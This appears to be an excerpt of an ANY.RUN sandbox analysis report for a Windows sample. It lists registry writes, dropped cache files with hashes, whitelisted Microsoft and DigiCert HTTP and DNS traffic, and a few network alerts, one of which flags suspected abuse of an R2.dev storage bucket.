(PID) Process:(5156) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(5156) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(5156) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(2924) SearchApp.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\SearchSettings
Operation:writeName:SafeSearchMode
Value:
1
(PID) Process:(2924) SearchApp.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\Flighting
Operation:writeName:CachedFeatureString
Value:
Executable files
0
Suspicious files
55
Text files
128
Unknown types
0

Dropped files

PID
Process
Filename
Type
2924SearchApp.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\ZWUI0EBX\www.bing[1].xml
MD5:
SHA256:
2924SearchApp.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\TokenBroker\Cache\fbaf94e759052658216786bfbabcdced1b67a5c2.tbres
MD5:
SHA256:
2924SearchApp.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5Y734AMR\67\Init[1].htm
MD5:
SHA256:
7400BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\26C212D9399727259664BDFCA073966E_F9F7D6A7ECE73106D2A8C63168CDA10D
MD5:
SHA256:
7400BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\dc876806-c81a-401b-8f8e-dd5bbbbc438e.down_data
MD5:
SHA256:
7400BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\dc876806-c81a-401b-8f8e-dd5bbbbc438e.50f3a84c-b62b-4e70-a8dc-35f675b353f6.down_meta
MD5:
SHA256:
7400BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\6c2da85b-aca5-44b3-900a-7e24f60965e6.50f3a84c-b62b-4e70-a8dc-35f675b353f6.down_meta
MD5:
SHA256:
2924SearchApp.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5Y734AMR\67\fvNdnrKxhhxDQUEi09cCaSWpzzE[1].csstext
MD5:15DC838A1A66277F9F4D915124DFFBBC
SHA256:9C947D5F732431197DA9DB1F159CB3D4CDC5DBFE55FDC0A9513E571FF31236A1
2924SearchApp.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5Y734AMR\67\FgBbpIj0thGWZOh_xFnM9i4O7ek[1].csstext
MD5:93C2665E2C62E2143F4D5063836B688A
SHA256:2842068E32CE3298230718DD40915A3C5D8F24B97B2A0801B2B0FD4FDEF79244
2924SearchApp.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5Y734AMR\67\pNXV2ymlrFEAOVLUgJkRBRwYFkY[1].jsbinary
MD5:1C4D6CA041F994E18637E8F5566A1F3F
SHA256:B87B991D28DAFD48331B81C759EA51D00E0D9256CD8593B3A9A56B1129F3B9DF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
12
TCP/UDP connections
62
DNS requests
33
Threats
4

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
23.216.77.36:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6544
svchost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
7400
BackgroundTransferHost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
5376
backgroundTaskHost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
2924
SearchApp.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
7572
SIHClient.exe
GET
200
23.219.150.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
7572
SIHClient.exe
GET
200
23.219.150.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
6816
mshta.exe
GET
200
23.209.209.135:80
http://x1.c.lencr.org/
unknown
whitelisted
5056
backgroundTaskHost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D
unknown
whitelisted
2924
SearchApp.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
2104
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5496
MoUsoCoreWorker.exe
23.216.77.36:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5496
MoUsoCoreWorker.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
3216
svchost.exe
40.113.110.67:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
20.190.160.3:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
184.30.131.245:80
ocsp.digicert.com
AKAMAI-AS
US
whitelisted
2112
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 20.73.194.208
whitelisted
google.com
  • 142.250.186.110
whitelisted
crl.microsoft.com
  • 23.216.77.36
  • 23.216.77.25
whitelisted
client.wns.windows.com
  • 40.113.110.67
whitelisted
login.live.com
  • 20.190.160.3
  • 40.126.32.74
  • 40.126.32.138
  • 20.190.160.64
  • 20.190.160.22
  • 40.126.32.72
  • 20.190.160.65
  • 20.190.160.4
whitelisted
ocsp.digicert.com
  • 184.30.131.245
whitelisted
arc.msn.com
  • 20.103.156.88
whitelisted
www.bing.com
  • 2.23.227.215
  • 2.23.227.208
whitelisted
fp.msedge.net
  • 204.79.197.222
whitelisted
th.bing.com
  • 2.23.227.208
  • 2.23.227.215
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] CloudFlare Public R2.dev Bucket
2196
svchost.exe
Misc activity
SUSPICIOUS [ANY.RUN] Abuse Public R2.dev Bucket
2924
SearchApp.exe
Not Suspicious Traffic
INFO [ANY.RUN] Azure Front Door domain observed in TLS SNI ( .azurefd .net)
2924
SearchApp.exe
Not Suspicious Traffic
INFO [ANY.RUN] Azure Front Door domain observed in TLS SNI ( .azurefd .net)
No debug info